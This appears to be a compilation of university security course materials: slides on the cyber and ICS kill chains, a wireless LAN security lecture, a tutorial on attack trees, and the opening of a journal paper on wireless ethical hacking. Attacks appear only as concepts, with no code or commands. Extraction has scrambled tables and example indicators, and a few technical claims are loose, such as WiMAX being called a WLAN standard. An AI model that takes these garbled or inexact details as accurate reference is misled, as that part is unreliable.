• Identify phases of intrusion.
• Map adversary kill chain indicators to defender courses of action.
• Identify patterns that link individual intrusions into broader campaigns.
• Understand the iterative nature of intelligence.
The Kill Chain model
• United States Department of Defense describes the kill chain with the stages:
Find, Fix, Track, Target, Engage and Assess (F2T2EA)
The United States Air Force

(USAF) has used this
framework to identify gaps in
Intelligence, Surveillance and
Reconnaissance (ISR)
capability and to prioritize the
development of needed
systems
• The fundamental element of intelligence in the Cyber Kill Chain model is the
indicator; any piece of information that objectively describes an intrusion.

• Atomic
• Computed
• Behavioural
Atomic indicators
• Atomic indicators are those which cannot be broken down into smaller
parts and retain their meaning in the context of an intrusion.
• Typical examples here are IP addresses, email addresses and vulnerability

identifiers.
[email protected]
68.1.5
192.1 CVE-1999-0067

Computed indicators
• Computed indicators are those which are derived from data involved in an
incident.

expressions.
• Behavioural indicators are collections of computed and atomic indicators,

often subject to qualification by quantity and possibly combinatorial logic.
•Example:
•“the intruder would initially use a backdoor which generated network traffic
matching [regular expression] at the rate of [some frequency] to [some IP
address], and then replace it with one matching the [MD5 hash value] once
access was established”
Indicator life cycle states and transitions
Intrusion Kill Chain
• Intrusion:
- aggressor must develop a payload to breach a trusted boundary,
- establish a presence inside a trusted environment,
- take actions towards their objectives (moving laterally inside the environment or violating
the confidentiality, integrity, or availability)
• Intrusion (Cyber) Kill Chain:

- reconnaissance, weaponisation, delivery, exploitation, installation, command and
control (C2), and actions on objectives.
Intrusion Kill Chain - Reconnaissance
• Research, identification and selection of targets, often represented as crawling

Internet websites such as conference proceedings and mailing lists for email
addresses, social relationships, or information on specific technologies.
1. Passive Reconnaissance: It is gathering the information about target without

letting him know about it.
2. Active Reconnaissance: It is much deeper profiling of target which might

trigger alert to the target [2].
Type of
Techniques Techniques Used
Reconnaissance
Target Identification and
1 passive Domain Names, whois, records from APNIC, RIPE, ARIN
Selection
2 Target Profiling
(a) Target Social Profiling Passive Social Networks, Public Documents, Reports and Corporate Web- sites
(b) Target System
Active Pingsweeps, Fingerprinting, Port Scanning and services
Profiling
3 Target Validation Active SPAM Messages, Phishing Mails and Social Engineering
•Research, identification and selection of targets, often represented as crawling

Internet websites such as conference proceedings and mailing lists for email
addresses, social relationships, or information on specific technologies.
•Examples of reconnaissance in ICS environments?

Intrusion Kill Chain - Weaponization
•Coupling a remote access trojan with an exploit into a deliverable payload, typically by
means of an automated tool (weaponizer).
•Client application data files such as Adobe Portable Document Format (PDF) or Microsoft
Office documents serve as the weaponised deliverable.
•Weaponizer examples in ICS?

Intrusion Kill Chain - Delivery
• Transmission of the weapon to the targeted environment. The three most prevalent
delivery vectors for weaponised payloads by APT actors are:
- email attachments,
- websites, and
- USB removable media.
• Can you identify the prevalent transmission mechanisms in ICS?

Intrusion Kill Chain - Exploitation
• After the weapon is delivered to victim host, exploitation triggers intruders’

code. Most often, exploitation targets an application or operating system
vulnerability, but it could also more simply exploit the users themselves or
leverage an operating system feature that auto-executes code.
• Attack against the user or attack against the system?

Intrusion Kill Chain - Installation
• Installation of a remote access trojan or backdoor on the victim system allows

the adversary to maintain persistence inside the environment.
• Any examples of the Installation phase in ICS?

Intrusion Kill Chain - Command and Control (C2)
• Typically, compromised hosts must beacon outbound to an Internet controller

server to establish a C2 channel. Once the C2 channel establishes, intruders
have “hands on the keyboard” access inside the target environment.
• What is the difference in ICS?

Intrusion Kill Chain - Actions on Objectives
• Typically, this objective is data exfiltration which involves collecting,

encrypting and extracting information from the victim environment;
violations of data integrity or availability are potential objectives as well.
Alternatively, the intruders may only desire access to the initial victim box for
use as a hop point to compromise additional systems and move laterally
inside the network.
• What is the difference in ICS?

Course of action
Example
Use of Intrusion Kill Chain Model
• Defenders must be able to move their detection and analysis up the kill chain
and more importantly to implement courses of actions across the kill chain.
• Force an adversary to change every phase of their intrusion in order to
successfully achieve their goals; increase the cost for adversary
•-----------------------------------------------------------------------------------------------
• Equally important is synthesis of unsuccessful intrusions; what might have

happened should future intrusions circumvent the currently effective protections
and detections.
Campaign analysis
• The principle goal of campaign analysis is to determine the patterns and

behaviors of the intruders, their tactics, techniques, and procedures (TTP), to
detect “how” they operate rather than specifically “what” they do.
• As defenders study new intrusion activity, they will:

• either link it to existing campaigns
• or perhaps identify a brand new set of behaviors of a theretofore unknown
threat and track it as a new campaign
ICS Cyber kill chain model
•Cyber attacks on industrial control systems (ICS) differ in impact based on a

number of factors, including the adversary’s intent, their sophistication and
capabilities, and their familiarisation with ICS and automated processes.
•ICS Cyber Kill Chain is broken into two stages:
- Stage 1: Cyber intrusion preparation and execution

- Stage 2: ICS attack development and execution
• Traditionally classified as espionage or an intelligence operation.

• Very similar to Lockheed Martin’s cyber kill chain model.
• Purpose:
- gain access to information about the ICS,
- learn the system
- provide mechanisms to defeat internal perimeter protections or gain access to
production environments.
• Can be a critical phase for the planning and execution of

Stage 2.
• A significant amount of information about the ICS and the
industrial process, engineering and operations exists in
Internet-facing networks such as corporate or enterprise
networks.
• An attacker may perform Stage 1 against a supplier or
partner network to gain necessary information.
• Phase 1 can be bypassed in case of Internet-facing ICS
components.
• Unintended affects of Stage 1 attacks (e.g. port scanning
can lead to communication disruption) [3]
Attack development and tuning
• Aggressor develops a new capability tailored to affect a specific ICS

implementation and for the desired impact.
• Difficult to detect.
• There may also be significant lag between Stage 1 and Stage 2 operations
due to the need for prolonged development and testing time. This lag can
give the defender time to break the chain…
Validation
• Attacker tests his/her capability on similar or identically configured systems if the

capability is to have any meaningful and reliable impact.
• The adversary may acquire physical ICS equipment and software components.
• While it is difficult for most defenders to have insight into the ICS vendor community,
various government organisations can utilise their sources and methods to identify
unusual acquisitions of such equipment that may indicate a Stage 2 attack for an
already established Stage 1 operation.
ICS attack
• The adversary will deliver the capability, install it or modify existing system functionality,
and then execute the attack.
• The attack may have many facets (preparatory or concurrent attacks) that fall into the attack
categories of enabling, initiating or supporting to achieve their ultimate effect. These may
be necessary to trigger conditions needed to manipulate a specific element of the process,
initiate changes in process set points and variables or support the attack over time by such
tactics as spoofing state information to fool plant operators into thinking everything is normal
[3].
ICS attack
ICS attack
•The most common methods to achieve functional impact fall into three categories: loss, denial and manipulation.
- loss of view,
- denial of view,
- manipulation of view,
- denial of control,
- loss of control,
- manipulation of control,
- activation of safety,
- denial of safety,
- manipulation of safety and
- manipulation of sensors and instruments
Wider reading
• FireEye Report provided invaluable incident response insight (fireeye.com)

• Dragos Report provides Necessary ICS Context in regard to SIS Operation
and Adversary Kill Chain Mapping (dragos.com)
• Schneider Electric Security Notification Document provides vendor

recommendations and reference point for customer to pursue ongoing
discussions (Schneider-electric.com)
• NCCIC Malware analysis report provides two execution flow diagrams and a
brief reference to some program capability regardless of Key switch position.
(https://us-cert.cisa.gov/ncas)
References
•[1] Hutchins, E.M., Cloppert, M.J. and Amin, R.M., 2011. Intelligence-driven computer
network defense informed by analysis of adversary campaigns and intrusion kill chains.
Leading Issues in Information Warfare & Security Research, 1(1), p.80.
•[2] Yadav, T. and Rao, A.M., 2015, August. Technical aspects of cyber kill chain. In
International Symposium on Security in Computing and Communication (pp. 438-452).
Springer, Cham.
•[3] https://www.sans.org/reading-room/whitepapers/ICS/industrial-control-system-
cyber-kill-chain-36297 [Accessed on 24/02/2020]
Wireless LAN Security and
Forensics
Lecture Overview
• Introduction to Wireless
• Components of WLANs
• WLAN Operation
• WLAN Threats
• Secure WLANs
Types of Wireless Networks
• Wireless Personal-Area Network (WPAN) – Low power and short-range
(20-30ft or 6-9 meters). Based on IEEE 802.15 standard and 2.4 GHz
frequency. Bluetooth and Zigbee are WPAN examples.
• Wireless LAN (WLAN) – Medium-sized networks up to about 300 feet.
Based on IEEE 802.11 standard and 2.4 or 5.0 GHz frequency.
• Wireless MAN (WMAN) – Large geographic area such as a city or district.
Uses specific licensed frequencies.
• Wireless WAN (WWAN) – Extensive geographic area for national or global
communication. Uses specific licensed frequencies.
Wireless Technologies
Bluetooth – IEEE WPAN standard used for device pairing at up to 300ft
(100m) distance.
• Bluetooth Low Energy (BLE) – Supports mesh topology to large-scale
network devices.
WiMAX (Worldwide Interoperability for Microwave Access) –
Alternative broadband wired internet connections. IEEE 802.16 WLAN
standard for up 30 miles (50 km).
Wireless Technologies (Cont.)
Cellular Broadband – Carry both voice and data. Used by
phones, automobiles, tablets, and laptops.
• Global System of Mobile (GSM) – Internationally
recognised
• Code Division Multiple Access (CDMA) – Primarily used in
the US.
Satellite Broadband – Uses directional satellite dish aligned
with satellite in geostationary orbit. Needs a clear line of site.
Typically used in rural locations where cable and DSL are
unavailable.
802.11 Standards
802.11 WLAN standards define how radio frequencies are used for
wireless
IEEE Standardlinks. Radio Frequency Description
802.11 2.4 GHz Data rates up to 2 Mb/s

802.11a 5 GHz Data rates up to 54 Mb/s
Not interoperable with 802.11b or 802.11g
802.11b 2.4 GHz Data rates up to 11 Mb/s
Longer range than 802.11a and better able to penetrate building
structures
802.11g 2.4 GHz Data rates up to 54 Mb/s
Backward compatible with 802.11b
802.11n 2.4 and 5 GHz Data rates 150 – 600 Mb/s
Require multiple antennas with MIMO technology
802.11ac 5 GHz Data rates 450 Mb/s – 1.3 Gb/s
Supports up to eight antennas
802.11ax 2.4 and 5 GHz High-Efficiency Wireless (HEW)
Capable of using 1 GHz and 7 GHz frequencies
Radio Frequencies
All wireless devices operate in the range of the electromagnetic spectrum.
WLAN networks operate in the 2.4 and 5 GHz frequency bands.
• 2.4 GHz – 802.11b/g/n/ax
• 5 GHz – 802.11a/n/ac/ax
Wireless Standards Organizations
Standards ensure interoperability between devices that are made by different
manufacturers. Internationally, the three organisations influencing WLAN
standards:
• International Telecommunication Union (ITU) – Regulates the allocation of
radio spectrum and satellite orbits.
• Institute of Electrical and Electronics Engineers (IEEE) – Specifies how a
radio frequency is modulated to carry information. Maintains the standards for
local and metropolitan area networks (MAN) with the IEEE 802 LAN/MAN
family of standards.
• Wi-Fi Alliance – Promotes the growth and acceptance of WLANs. It is an
association of vendors whose objective is to improve the interoperability of
products that are based on the 802.11 standard
WLAN Components
© 2016 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 9
Wireless NICs
To communicate wirelessly, laptops, tablets, smartphones, and even the
latest automobiles include integrated wireless NICs that incorporates a
radio transmitter/receiver.
If a device does not have an integrated wireless NIC, then a USB
wireless adapter can be used.
Wireless Home Router
A home user typically interconnects wireless devices using a small wireless
router.
Wireless routers serve as the following:
• Access point – To provide wireless access
• Switch – To interconnect wired devices
• Router - To provide a default gateway to other networks and the Internet
Wireless Access Point
Wireless clients use their wireless NIC to

discover nearby access points (APs).
Clients then attempt to associate and
authenticate with an AP.
After being authenticated, wireless users
have access to network resources.
Cisco Meraki Go access points

Wireless Antennas
Types of external antennas:
• Omnidirectional – Provide 360-degree coverage. Ideal in
houses and office areas.
• Directional – Focus the radio signal in a specific direction.
Examples are the Yagi and parabolic dish.
• Multiple Input Multiple Output (MIMO) – Uses multiple
antennas (Up to eight) to increase bandwidth.
WLAN Operation
WLAN Operation
802.11 Wireless Topology Modes

Ad hoc mode - Used to connect clients in a peer-to-peer
manner without an AP.
Infrastructure mode - Used to connect clients to the

network using an AP.
Tethering - Variation of the ad hoc topology is when a

smartphone or tablet with cellular data access is enabled to
create a personal hotspot.
WLAN Operation
BSS and ESS

Infrastructure mode defines two topology blocks:
Basic Service Set (BSS)
• Uses a single AP to interconnect all associated
wireless clients.
Extended Service Set (ESS)
• A union of two or more BSSs interconnected by a
wired distribution system.
• Clients in each BSS can communicate through the
ESS.
WLAN Operation
802.11 Frame Structure

The 802.11 frame format is similar to the Ethernet frame format,
except that it contains more fields.
WLAN Operation
CSMA/CA
WLANs are half-duplex, and a client cannot “hear” while it is sending, making it impossible to
detect a collision.
WLANs use carrier sense multiple access with collision avoidance (CSMA/CA) to determine
how and when to send data. A wireless client does the following:
1. Listens to the channel to see if it is idle, i.e. no other traffic currently on the channel.
2. Send a ready-to-send (RTS) message to the AP to request dedicated access to the
network.
3. Receives a clear to send (CTS) message from the AP granting access to send.
4. Waits a random amount of time before restarting the process if no CTS message is
received.
5. Transmits the data.
6. Acknowledges all transmissions. If a wireless client does not receive an
acknowledgement, it assumes a collision occurred and restarts the process.
WLAN Operation
Wireless Client and AP Association
For wireless devices to communicate over

a network, they must first associate with
an AP or wireless router.
Wireless devices complete the following
three stage process:
• Discover a wireless AP
• Authenticate with the AP
• Associate with the AP
WLAN Operation
Wireless Client and AP Association (Cont.)
To achieve a successful association, a wireless client and an AP must agree on specific

parameters:
• SSID – The client needs to know the network’s name to connect.
• Password – This is required for the client to authenticate to the AP.
• Network mode – The 802.11 standard in use.
• Security mode – The security parameter settings, i.e. WEP, WPA, WPA2, WPA3
• Channel settings – The frequency bands in use.
Channel Management
Frequency Channel Saturation
Channel saturation can be mitigated using the following techniques:
• Direct-Sequence Spread Spectrum (DSSS) - A modulation technique to
spread a signal over a larger frequency band. Used by 802.11b devices to
avoid interference from other devices using the same 2.4 GHz frequency.
• Frequency-Hopping Spread Spectrum (FHSS) - Transmits radio signals by
rapidly switching a carrier signal among many frequency channels. The
sender and receiver must be synchronised to “know” which channel to jump
to. Used by the original 802.11 standards.
• Orthogonal Frequency-Division Multiplexing (OFDM) - A subset of
frequency division multiplexing in which a single channel uses multiple sub-
channels on adjacent frequencies. OFDM is used by several communication
systems, including 802.11a/g/n/ac.
Channel Management
Channel Selection
• The 2.4 GHz band is subdivided into multiple channels, each allotted 22 MHz
bandwidth and separated from the next channel by 5 MHz.
• A best practice for 802.11b/g/n WLANs requiring multiple APs is to use non-
overlapping channels such as 1, 6, and 11.
WLAN Threats
WLAN Threats
Wireless Security Overview

A WLAN is open to anyone within range of an AP and the appropriate
credentials to associate with it.
Attacks can be generated by outsiders and disgruntled employees.
Wireless networks are specifically susceptible to several threats, including
the following:
• Interception of data
• Wireless intruders
• Denial of Service (DoS) Attacks
• Rogue APs
WLAN Threats
DoS Attacks
Wireless DoS attacks can be the result of the following:
• Improperly configured devices
• A malicious user intentionally interfering with the wireless
communication
• Accidental interference
To minimise the risk of a DoS attack due to improperly configured
devices and malicious attacks, harden all devices, keep passwords
secure, create backups, and ensure that all configuration changes are
incorporated off-hours.
WLAN Threats
Rogue Access Points

• A rogue AP is a wireless router connected to a corporate network without
explicit authorisation and against corporate policy.
• Once connected, the rogue AP can be used by an attacker to capture
MAC addresses, capture data packets, gain access to network
resources, or launch a man-in-the-middle attack.
• A personal network hotspot could also be used as a rogue AP. For
example, a user with secure network access enables their authorised
Windows host to become a Wi-Fi AP.
• To prevent the installation of rogue APs, organisations must configure
WLCs with rogue AP policies and use monitoring software to monitor the
radio spectrum for unauthorised APs actively.
WLAN Threats
Man-in-the-Middle Attack
In a man-in-the-middle (MITM) attack, the hacker is positioned in
between two legitimate entities to read or modify the data that passes
between the two parties. A widespread wireless MITM attack is called
the “evil twin AP” attack, where an attacker introduces a rogue AP and
configures it with the same SSID as a legitimate AP.
Defeating a MITM attack begins with identifying legitimate devices on

the WLAN. To do this, users must be authenticated. After all of the
legitimate devices are known, the network can be monitored for
abnormal devices or traffic.
Secure WLANs
Secure WLANs
SSID Cloaking and MAC Address Filtering
To address the threats of keeping wireless intruders out and protecting data, two
early security features were used and are still available on most routers and APs:
SSID Cloaking
• APs and some wireless routers allow the SSID beacon frame to be disabled.
Wireless clients must be manually configured with the SSID to connect to the
network.
MAC Address Filtering
• An administrator can manually permit or deny clients wireless access based on
their physical MAC hardware address. In the figure, the router is configured to
permit two MAC addresses. Devices with different MAC addresses will not be
able to join the 2.4GHz WLAN.
Secure WLANs
802.11 Original Authentication Methods
The best way to secure a wireless network is to use authentication and
encryption systems. Two types of authentication were introduced with the original
802.11 standards:
Open system authentication
• No password required. Typically used to provide free internet access in public
areas like cafes, airports, and hotels.
• Client is responsible for providing security, such as through a VPN.
Shared key authentication
• Provides mechanisms, such as WEP, WPA, WPA2, and WPA3, to
authenticate and encrypt data between a wireless client and AP. However, the
password must be pre-shared between both parties to connect.
Secure WLANs
Shared Key Authentication Methods
Authentication Description
Method
Wired Equivalent The original 802.11 specification designed to secure the data using the
Privacy (WEP) Rivest Cipher 4 (RC4) encryption method with a static key. WEP is no
longer recommended and should never be used.
Wi-Fi Protected A Wi-Fi Alliance standard that uses WEP but secures the data with the
Access (WPA) much stronger Temporal Key Integrity Protocol (TKIP) encryption
algorithm. TKIP changes the key for each packet, making it much more
difficult to hack.
WPA2 It uses the Advanced Encryption Standard (AES) for encryption. AES is
currently considered the strongest encryption protocol.
WPA3 This is the next generation of Wi-Fi security. All WPA3-enabled devices
use the latest security methods, disallow outdated legacy protocols, and
require the use of Protected Management Frames (PMF).
Secure WLANs
WPA 3
Because WPA2 is no longer considered secure, WPA3 is recommended when
available. WPA3 Includes four features:
• WPA3 – Personal: Thwarts brute force attacks by using Simultaneous
Authentication of Equals (SAE).
• WPA3 – Enterprise : Uses 802.1X/EAP authentication. However, it requires
using a 192-bit cryptographic suite and eliminates the mixing of security
protocols for previous 802.11 standards.
• Open Networks: Does not use any authentication. However, uses
Opportunistic Wireless Encryption (OWE) to encrypt all wireless traffic.
• IoT Onboarding: Uses Device Provisioning Protocol (DPP) to quickly
onboard IoT devices.
Summary
• Wireless LANs (WLANs) are based on IEEE standards and can be classified into four main
types: WPAN, WLAN, WMAN, and WWAN.
• Wireless technology uses the unlicensed radio spectrum to send and receive data.
Examples of this technology are Bluetooth, WiMAX, Cellular Broadband, and Satellite
Broadband.
• WLAN networks operate in the 2.4 GHz frequency band and the 5 GHz band.
• Wireless LAN devices have transmitters and receivers tuned to specific frequencies of radio
waves to communicate. Ranges are then split into smaller ranges called channels: DSSS,
FHSS, and OFDM.
• The 802.11b/g/n standards operate in the 2.4 GHz to 2.5GHz spectrum. The 2.4 GHz band
is subdivided into multiple channels. Each channel is allotted 22 MHz bandwidth and is
separated from the next channel by 5 MHz.
• Wireless networks are susceptible to threats, including data interception, wireless intruders,
DoS attacks, and rogue APs.
• There are four shared essential authentication techniques available: WEP, WPA, WPA2, and
WPA3.
Critical Systems Security
Week 7 Tutorial – Defence in Depth
Task 1.
Boundary Protection.
In groups work through this network diagram, discuss which measures to put in place and
provide a brief rationale for each measure. (Approach this from an illative design, showing
the evolution of the network design)
Figure 1 - Network to segregate

Task 2.
In same groups of different, complete the following modelling.
1. RFID entry system. Block Communication.

2. Accessing bank account. ATM and Online.
3. Attack tree on a password.
4. Compromise an air gaped network.
For each of the above, produce the following:

Identify Attack Vectors,
Describe the attack surface,
Produce an Attack Tree,
Figure 2 - Compromising RFID – start of a possible solution
Task 3.
Consider further mitigation of the risks you have identified within your Attack Trees.
Consider kill chain. (Sans – ICS Kill Chain white paper)
Example of attack event. Read w32 Stuxnet dossier
Journal of Modern Technology and Engineering
Vol.8, No.3, 2023, pp.207-219
ENHANCING WIRELESS NETWORK SECURITY VIA ETHICAL

HACKING: STRATEGIES AND BEST PRACTICES
ID
Salah Abdulghani Alabady1 , ID
Mohammed A. M. Abdullah2 ,
ID
Kaeed Ketab Kaeed1
1 Collegeof Engineering, Computer Engineering Department, University of Mosul, Iraq

2 Computer and Information Engineering Department, College of Electronics Engineering, Ninevah
University, Mosul, Iraq
Abstract. Wireless networks have experienced rapid expansion in recent years and are now one of the fastest-
growing industries in the telecommunications industry. Wireless communication technologies are popular due to
their advantages over wireline systems. The most significant advantage is the lack of cables, which permits the
three paradigms: communication everywhere, at any time, with anybody. However, the convenience of WLANs
brings greater security risks than security in the wired environment. Wireless communication data packets are in
the air and available to anyone who can intercept and decode them. So, the most significant source of risk in a
wireless network is that the technology underlying the communication medium, the airwave, is open to intruders.
This leads us to the idea of ethical hacking. Ethical hacking, often known as white-hat hacking, refers to the use
of hacking to test and strengthen defenses against unethical hackers. Ethical hacking employs the same tools and
tactics as unethical hacking, but it also requires substantial upfront planning, a set of specific tools, complicated
testing processes, and adequate follow-up to resolve any issues before unethical hacking exploits them. In this
paper, we aim to present various threats and vulnerabilities associated with 802.11-based wireless networks and
the possibility of ethical hacking to find the point of failure in trying to overcome these problems.
Keywords: Wireless Security, Ethical Hacking, IEEE 802.11, Performance Analysis

AMS Subject Classification: 68M15.
Corresponding author: Salah A., Alabady, College of Engineering, Computer Engineering Department, Uni-
versity of Mosul, Iraq, e-mail: [email protected]
Received: 12 February 2023; Revised: 18 July 2023; Accepted: 15 August 2023;
Published: 30 December 2023.
1 Introduction
Wireless networks have experienced rapid expansion in recent years and are now one of the
fastest-growing industries in the telecoms sector. Wireless local area networks, cellular, cord-
less, and satellite phones, as well as other wireless communication technologies, are now widely
used and regarded by many as indispensable tools for daily life. The benefits of wireless com-
munication systems over wired systems account for their growing popularity. The lack of cables,
which permits the three paradigms of communication-anywhere, anytime, with anyone-is the
main benefit.
It is important to note that current standards-based wireless LANs function at fast rates
Michael (2002). Typically, the speed ranges from 2 Mbps to over 54 Mbps. For a variety of
applications or services delivered via a PC or mobile device, this bandwidth is unquestionably
sufficient to provide an excellent user experience. Government organizations, individual con-
sumers, and commercial enterprises all utilize or are considering adopting wireless technologies.
207
These organizations should be mindful of the security dangers connected to wireless technolo-
gies, though. As they integrate wireless technologies into their computer environments, agencies
must create measures to reduce hazards Gupta and Jha (2015), Alabady and Salleh (2013).
The main contribution of this paper is to present the main weaknesses of wireless and pro-
posed solutions and recommendations that can be taken to protect the wireless network. In this
context, a simple network is designed to simulate the practical situation as an eavesdropping
point. Sniffing software are tested under both Windows and Linux environment which indicated
the weakness of the old security protocol.
The remainder of this paper is organized as follows. In section 2, the background is explained,
section 3, we reviewed the related work. Section 4 describes the security characteristics of 802.11
wireless LANs. In Section 5, the practical work is evaluated and shows the results. Finally,
Section 6 presents the recommendations and conclusions remarks.
2 Background
Before diving into the details of wireless security, it is essential to know the wireless topology
and wireless standard protocols. These are going to be presented in the next sub-sections.
2.1 Wireless LANS Topology

In any wireless network, there are three topologies for wireless LANs:
• Infrastructure mode: A topology known as an infrastructure extends a wired LAN to

wireless devices by providing a base station (also known as an access point). The access
point serves as a central controller for the wireless LAN by bridging the wireless and wired
networks.
• Ad-hoc mode:In an ad-hoc topology, a LAN is built entirely by the wireless devices
themselves without the use of a central controller or access point. Instead of using a
centralized controller, each device connects directly with the other devices in the network.
• Mixed Network mode: Every wireless station can operate in both of the aforementioned
modes at once. The Extended Basic Service Set (EBSS) is another name for this Mao et al.
(2018) [4].
2.2 Wireless LAN Standard

• 802.11b: 802.11b was long recognized as the most extensively used Wi-Fi standard. It
makes use of frequencies between 2.400 and 2.485 GHz. The maximum 802.11b speed is
11 Mbps.
• 802.11g: The 802.11g protocol was approved in 2003 to match the 54-Mbps speed claims
of 802.11a. This protocol used the 2.4 GHz band of 802.11b and the OFDM modula-
tion method from 802.11a. It was able to maintain backward compatibility with 802.11b
equipment because it operated at 2.4 GHz.
• 802.11n: Since several years ago, the IEEE 802.11 Task Group n (TGn) has been develop-
ing a new wireless standard that will offer significantly more application data throughput
than current 802.11a/b/g wireless standards. Solutions built on the 802.11n standard will
support existing 802.11a/b/g deployments with a maximum data rate of 250 Mbps and
operate in the 2.4-GHz, 5-GHz, or both radio bands Bendale and Prasad (2018).
208
• 802.11i: The Working Group of IEEE 802.11 has been working on MAC enhancement.
Task Group I (TGi) is working on security. It replaced the previous security rules by pro-
viding a Robust Security Network (RSN) with two new protocols: the group key handshake
and the four-way handshake. These employ the port access control and authentication ser-
vices mentioned in IEEE 802.1X to establish the appropriate cryptographic keys He et al.
(2019).
• 802.11ac: The fifth version of WiFi is known as 802.11ac or WiFi 5. It is an improvement

over IEEE 802.11n. In order to keep up with the increasing number of people, devices,
and data usage, WiFi 5 was intended to have faster speeds, WiFi performance, and better
range. 802.11ac has a theoretical maximum speed of 1,300 Mbps (1.3 Gbps) - 2,300 Mbps
(2.3 Gbps). The channel bandwidth of 802.11ac supported a maximum of 80 MHz.
• 802.11ax: The newest form of wireless technology is known as Wi-Fi 6. Compared to

Wi-Fi 5, Wi-Fi 6 offers more coverage, longer battery life, and better performance. Wi-Fi
6 was initially intended to alleviate bandwidth issues in crowded, high-traffic areas like
trains, stadiums, airports, and offices. 802.11ax radios can operate with both 2.4 GHz and
5 GHz frequency bands. Wi-Fi 6 by using multiple channels could have a maximum speed
of 9.6 Gbps.
3 Related work
The authors in Badholia et al. (2019) studied wireless network system (WNS) protocols i.e.
WEP, WAP, and WPA2. They proposed an improved version of mentioned protocols. They
based on algebraic, statistics, and logarithmic methods to build their new protocols. Results
indicate that the upgraded versions of WEP, WAP, and WAP2 operate more effectively and
securely. The authors of Faika et al. (2019) suggested using blockchain technology to protect
an IoT-enabled WBMS’s communication and data from harmful cyber-attacks. Their module is
strengthened by the findings of their experiments. Each of the five IoT Raspberry Pi 3 boards
has a smart contract installed on the Hyper-ledger Fabric blockchain platform. In contrast to
other blockchain platforms, they recommend using IBM’s Hyper-ledger Fabric, which will be
more relevant to IoT applications. Their findings offer the possibility of improving the cyber
security of WBMSs, which encourages the spread of Li-ion battery systems in cyber-physical
environments.
In order to determine wireless device authentication, Yun Lin and Jie Chang Lin and Chang
(2019) offer a radio frequency fingerprint extraction technique based on fractional Fourier trans-
form for transient signals. The findings demonstrate that this method’s recognition rate is very
near to 100% when the SNR is 20 dB. 10 Motorola walkie-talkies were also utilized to test the
effectiveness of the identifying procedure. The authors of Jilani et al. (2020) researched the risks
associated with wireless sensor networks. DoS attacks, black hole attacks, and wormhole attacks
were shown to be the most frequent dangers. They suggested a detection algorithm, equipped
to spot intrusions in advancing real-world circumstances.
Rajwinder Kaur and Jasminder Kaur Kaur and Sandhu (2021) presented the various secu-
rity measures that employ a machine learning (ML) strategy to counter intrusion attempts on
network data. They classify security assaults based on layer and kind and then use machine
learning to represent the appropriate response. The layer name and associated procedures are
listed in a schedule that was also created. Using open-source software and commercially acces-
sible hardware, the authors of Hoseini et al. (2022) created a physical layer security solution for
protecting wireless communications. This solution took advantage of the physical features of
the wireless channel. In order to manage and degrade the quality of the eavesdropper’s channel,
they practically manipulated the connectivity of the legitimate station using the flexibility and
control granularity offered by the relatively recent concept of spectrum programming.
209
Their success is attributed to the idea of spectrum programming, which is relatively new and
enables the centralization of the required measurements and controls. Haiwei Wu and Hanling
Wu Wu and Wu (2021) investigated the security issues in wireless sensor network applications
and investigated the mechanisms for protecting information security. They concluded that the
only way to accelerate the advancement of productive forces and information technology was
to grasp the science and technological development trend and work to remove its shortcom-
ings. The authors in Chen et al. (2021) proposed a new data processing method called Hex
Word2VecKMeans Smote (HWKS) to detect Abstract-Intrusion of wireless networks. They also
proposed an improved version of the Aegean WiFi Intrusion Dataset (AWID). They also boost
their suggestion with experimental results which show that, on the one hand, the HWKS method
is reasonable and new AWID is more effective and challenging; on the other hand, data sets sim-
ilar to AWID can be processed by the HWKS method, so the evaluation of different research
work will be consistent and comparable.
Wireless networks can be protected from potential threats by using the network security
monitoring system implemented by the authors in Maesaroh et al. (2022), which uses iptables
as an attack handler and Snort as a sensor engine. They discovered that the Intrusion Detection
System (IDS) system detects threats by examining a variety of sources and network traffic.
Additionally, they discovered that a computer network can only be monitored by a machine
or computer that functions as a sensor in the network and can witness all of the events that
take place in it. When using a Wireless Mobile network, the authors of Anitha et al. (2022)
hypothesize a reliable communication protocol with improved security handling capabilities.
The Novel Threat Management Scheme (NTMS) was the name given to their strategy. The
scientists developed their method by combining two various traditional methods, such as the
AODV and Data Hashing techniques. They combine to produce logic of security effectiveness,
data integrity level, access control capabilities, and bandwidth utilization level.
Wi-Fi-related network assaults were researched by Yuanyuan Liu Liu (2022). By studying
and evaluating network attack behaviors connected to Wi-Fi, he sought to identify and analyze
the preventative measures of wireless network security threats in order to enhance the security
of the wireless network. He examined real-world examples of wireless network threats before
putting out workable solutions. For cooperative virtual networks in the IoT era, the authors of
Alabady et al. (2020) presented a design of a typical network security paradigm. In addition to
a policy to reduce those risks, this article covers and explores network security vulnerabilities,
threats, attacks, and dangers in switches, firewalls, and routers. A network security model
using a static VLAN and a AAA server with the TACACS+ protocol is presented in the paper
Alabady (2008). The planning and execution of a network security framework using routers
and firewalls are presented in the paper Alabady (2009). Additionally, the paper examined the
network security flaws in router and firewall network devices, the different dangers and how to
counteract them, as well as how to stop attacks and hacker access to the network.
4 802.11 Wireless LAN Security Features

Network security is the procedure used to safeguard digital information assets. The protection
of confidentiality, upkeep of integrity, and guarantee of availability are the main goals of security
Patil et al. (2020). In 802.11 networks, there are three primary ways to prevent unauthorized
access to an AP:
1. Service set identifier (SSID): The use of an SSID connected to an AP or collection of

APs can be used to obtain control over network access. A wireless network can be divided
into different networks that are served by one or more APs using the SSID technique. Each
AP has an SSID pre-programmed that matches to a particular wireless network. This is
comparable to how wired LANs use the idea of a network address. The client’s computer
210
needs to be set up with the correct SSID in order to access a specific wireless network
Pamarthi and Narmadha (2022).
2. MAC Address Filtering: The 802.11 network card on a client computer has a specific
MAC address that can be used to identify it. To enhance AP access control, it is possible
to program each AP with a list of the MAC addresses of the client computers that are
permitted access. If a client’s MAC address is not included in this list, they are not allowed
to access the AP and their given SSID does not match the SSID of the AP Nazir et al.
(2021).
3. Wired Equivalent Privacy (WEP): The IEEE 802.11 WLAN specifications include
WEP. Its main goal is to guarantee data secrecy over wireless networks at a level compa-
rable to wired local area networks (LANs). Each data packet in WEP contains an integrity
check field that makes sure the data is not altered while being sent Zaman et al. (2021)
Jilani et al. (2020). For this, a CRC-32 checksum is utilized. The WEP protocol consists
of three parts: an initialization vector (IV) of 24 bits, a shared secret key (k 40 bits or
104 bits), and the RC4 algorithm (RC4 IV, k). A shared secret key (k 40bit / 104 bit)
makes use of the shared secret key to reduce the load on AP while also presuming that
the recipient of the secret key is a reliable individual. This shared key is never trans-
mitted wirelessly. The installation of this key on Work Stations is not covered by IEEE
802.11 specifications. Each WS/AP requires manual installation. The majority of APs
